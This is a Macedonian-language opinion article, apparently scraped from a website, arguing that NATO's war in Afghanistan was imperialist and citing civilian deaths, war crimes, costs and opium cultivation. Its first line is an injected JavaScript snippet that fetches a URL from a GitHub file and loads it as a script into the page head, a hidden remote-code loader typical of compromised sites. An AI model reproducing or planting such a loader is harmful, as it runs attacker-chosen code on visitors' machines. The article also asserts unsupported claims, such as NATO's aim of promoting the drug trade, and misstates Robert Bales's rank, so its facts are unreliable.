;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Авганистан e доказ дека „хуманитарна интервенција“ е империјалистичка лага - Антропол
Актуелно

Авганистан e доказ дека „хуманитарна интервенција“ е империјалистичка лага

Воениот пакт НАТО донесе одлука за повлекување од Авганистан после 20 годишната окупација на земјата која започна во 2001 година под изговор на таканаречената „војна врз тероризмот“. Во официјалното известување за одлуката НАТО вели дека биле „постигнати нивните цели“, но кои се тие цели кои тие ги постигнале?

Иако не постојат официјални податоци за бројот на цивили кои загинали за време на војната, се претпоставува дека американските војски се одговорни за смртта на најмалку 30,000 цивили. Според Универзитетот во Кабул, секој следен ден во војната имало нови 250 жртви. Дополнителни 60,000 цивили биле сериозно повредени. Како последица на војната 11 милиони луѓе станале бегалци. 

Во 2012 година американскиот полковник Роберт Бејлс беше обвинет за масовно убиство на 16 авганистански селани, вклучувајќи и 9 деца. Откако ги убил тој ги запалил нивните тела. Иако овој ужасен злочин се случи на авганистанска територија, Авганистан немаше право да му суди на сторителот или сторителите бидејќи се претпоставува дека не делувал сам туку во група. Тие безбедно беа извлечени од Авганистан и беа однесени во американската воена база во Канзас.

Меѓутоа, ова е далеку од изолиран случај. Во годините потоа имаше нови откритија за озлогласената американска „екипа на убијци“ кои намерно убивале Авганистанци избрани по случајност, како спортска активност. Честопати убивале и тинејџери, а потоа позирале со нивните мртви тела како со трофеи. Главниот командир на САД во Авганистан Генерал Стенли МекКристал дури и призна: „Ние убивме фантастичен број на луѓе и убивме голем број кои според моите сознанија не беа никаква закана за војската“.

Воениот дописник Џерон Старки рече: „Воените трупи на САД во Авганистан прават ужасни воени злосторства, лажат и се извлекуваат со тоа“. Во 2010 тој известуваше за инцидент во кој американски војници влегле во селото во провинцијата Пактија во Авганистан, ја обиколиле куќата во која фамилија го славела раѓањето на бебе. Најпрвин убиле двајца мажи кои излегле да прашаат зошто се обиколени, а потоа и три жени (две бремени мајки и тинејџерка). Пентагон потоа ги претставуваше како лажговци селаните кои инсистираа на тоа дека војниците убиле цивили, а медиумите само некритички ја преџвакуваа верзијата на американската војска. Со тек на време доволно докази беа собрани кои го примораа Пентагон да признае дека нивната приказна е целосно лажна, односно дека нивните војници намерно и со умисла убиле цивили. Во таа прилика Старки напиша: „Ова е можеби највознемирувачкиот пример, но ова не е првиот пат НАТО да лаже“. Меѓутоа, за ниту еден од овие злосторства не му беше дозволено на Авганистан да им суди на американските војници во сопствените судови. Една од најголемите привилегии на сите империи е тоа што таа не подлежи на закони или на одговорност, дури и кога станува збор за злосторства извршени на тло на други нации и против други народи.

Покрај жртвите, војната имаше и огромни финансиски и политички последици. Се претпоставува дека војната чинела над 60 милиони долари на ден или вкупно над 2 ипол трилиони долари, сума која е потрошена на финансирање и зацврстување на Американскиот воено-индустриски комплекс кој потоа се користи за водење на нови војни во служба на американскиот империјализам. 

После оваа „хуманитарна“ мисија на НАТО, предводена од САД и Британија, Авганистан е многу полошо место за живеење. Криминалот е на многу повисоко ниво, а инфраструктурата е тотално уништена. 

Четири дена пред почетокот на таканаречената „железна“ бура во ноември 2017 година, Канцеларијата на ООН за борба против дрога и криминал (UNODC) објави дека одгледувањето афион – од што се произведува хероин – се зголемило за повеќе од 120.000 хектари за само една сезона! Колку за споредба, кога британските и американските сили извршија инвазија на Авганистран, во октомври 2001 година, афионот се одгледуваше на околу 74 000 хектари. Додека сега, Новите бројки покажуваат дека производството се зголемило за повеќе од четири пати за 15 години: опиумот сега се одгледува на 328 000 хектари.

Покрај гео-стратешката важност на Авганистан, како локација што доста погодно ги опфаќа граничните страни на Иран, бишата држава на СССР и Н.Р. Кина, што регионот го прави идеално место за да се стави клин меѓу најголемите евроазиски сили и да се воспостави трајно воено присуство за идните операции во Евроазија, во оваа „мисија“ главна агенда на НАТО силите беше и поддршката и унапредувањето на трговијата со дрога, особено ако се има во предвид колку профити има оваа индусрија. 

Авганистан е најголем снабдувач на опиум во светот и скоро 90 проценти од светската илегална трговија потекнува од таму, што се смета за една од главните причини зошто НАТО силите ја окупираа оваа земја и зошто сакаат што подолго да имаат контрола над оваа територија!